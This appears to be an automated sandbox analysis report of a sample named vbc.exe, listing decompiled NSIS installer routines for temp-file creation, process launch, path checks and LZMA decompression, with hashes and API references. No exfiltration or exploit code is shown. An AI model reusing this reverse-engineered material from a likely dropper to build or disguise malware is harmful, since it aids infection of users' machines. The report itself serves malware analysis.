                          • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                          • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                          • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 576 40578b-405795 577 405796-4057c0 GetTickCount GetTempFileNameA 576->577 578 4057c2-4057c4 577->578 579 4057cf-4057d1 577->579 578->577 580 4057c6 578->580 581 4057c9-4057cc 579->581 580->581
                          C-Code - Quality: 100%
                          			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                          0x0040578f
                          0x00405795
                          0x00405796
                          0x00405796
                          0x00405797
                          0x0040579e
                          0x004057a8
                          0x004057b5
                          0x004057b8
                          0x004057c0
                          0x00000000
                          0x00000000
                          0x004057c4
                          0x00000000
                          0x00000000
                          0x004057c6
                          0x00000000
                          0x004057c6
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32("C:\Users\Public\vbc.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403223,1033,C:\Users\user\AppData\Local\Temp\), ref: 0040579E
                          • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004057B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                          • API String ID: 1716503409-1498418707
                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                          • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 582 4052e5-405312 CreateProcessA 583 405320-405321 582->583 584 405314-40531d CloseHandle 582->584 584->583
                          C-Code - Quality: 100%
                          			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                          0x004052ee
                          0x0040530a
                          0x00405312
                          0x00405317
                          0x00000000
                          0x0040531d
                          0x00405321

                          APIs
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                          • CloseHandle.KERNEL32(?), ref: 00405317
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                          • Error launching installer, xrefs: 004052F8
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                          • API String ID: 3712363035-3894416041
                          • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                          • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405659 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 672 405659-405674 call 405a85 call 40560c 677 405676-405678 672->677 678 40567a-405687 call 405ce3 672->678 679 4056cc-4056ce 677->679 682 405693-405695 678->682 683 405689-40568d 678->683 685 4056ab-4056b4 lstrlenA 682->685 683->677 684 40568f-405691 683->684 684->677 684->682 686 4056b6-4056ca call 405578 GetFileAttributesA 685->686 687 405697-40569e call 405d7c 685->687 686->679 692 4056a0-4056a3 687->692 693 4056a5-4056a6 call 4055bf 687->693 692->677 692->693 693->685
                          C-Code - Quality: 53%
                          			E00405659(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405A85(0x4218a0, _a4);
				_t21 = E0040560C(0x4218a0);
				if(_t21 != 0) {
					E00405CE3(_t21);
					if(( *0x423eb8 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x4218a0;
						while(1) {
							_t11 = lstrlenA(0x4218a0);
							_push(0x4218a0);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00405D7C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E004055BF(0x4218a0);
								continue;
							} else {
								goto L1;
							}
						}
						E00405578();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                          0x00405665
                          0x00405670
                          0x00405674
                          0x0040567b
                          0x00405687
                          0x00405693
                          0x00405693
                          0x004056ab
                          0x004056ac
                          0x004056b3
                          0x004056b4
                          0x00000000
                          0x00000000
                          0x00405697
                          0x0040569e
                          0x004056a6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040569e
                          0x004056b6
                          0x004056bc
                          0x00000000
                          0x004056ca
                          0x00405689
                          0x0040568d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040568d
                          0x00405676
                          0x00000000

                          APIs
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,fwwmjbqpxzax Setup,NSIS Error), ref: 00405A92
                            • Part of subcall function 0040560C: CharNextA.USER32(004053BE), ref: 0040561A
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,74EC13E0,004053BE,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 004056AC
                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74EC13E0,004053BE,?,"C:\Users\Public\vbc.exe" ,74EC13E0), ref: 004056BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                          • String ID: C:\
                          • API String ID: 3248276644-3404278061
                          • Opcode ID: 45f9fc393155a5db5d7088df542a2f6c776c74327cf868b98864bd445eec5352
                          • Instruction ID: 45da588c54f8925d2f58c8e200b054ed71ba1ecc9485bcb26325529b6e95793d
                          • Opcode Fuzzy Hash: 45f9fc393155a5db5d7088df542a2f6c776c74327cf868b98864bd445eec5352
                          • Instruction Fuzzy Hash: 4FF02D21604D5525D32222355C09FAF1B05CE863143994E3BF858B12D6C63D89428CAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 84%
                          			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                          0x004031f2
                          0x004031f8
                          0x004031fe
                          0x00403205
                          0x0040320a
                          0x00403212
                          0x0040321e
                          0x00403224
                          0x00403208
                          0x00403208
                          0x00403208

                          APIs
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?), ref: 00405D5D
                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Char$Next$CreateDirectoryPrev
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 4115351271-1176120985
                          • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                          • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                          • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                          Download Yara Rule
                          C-Code - Quality: 99%
                          			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
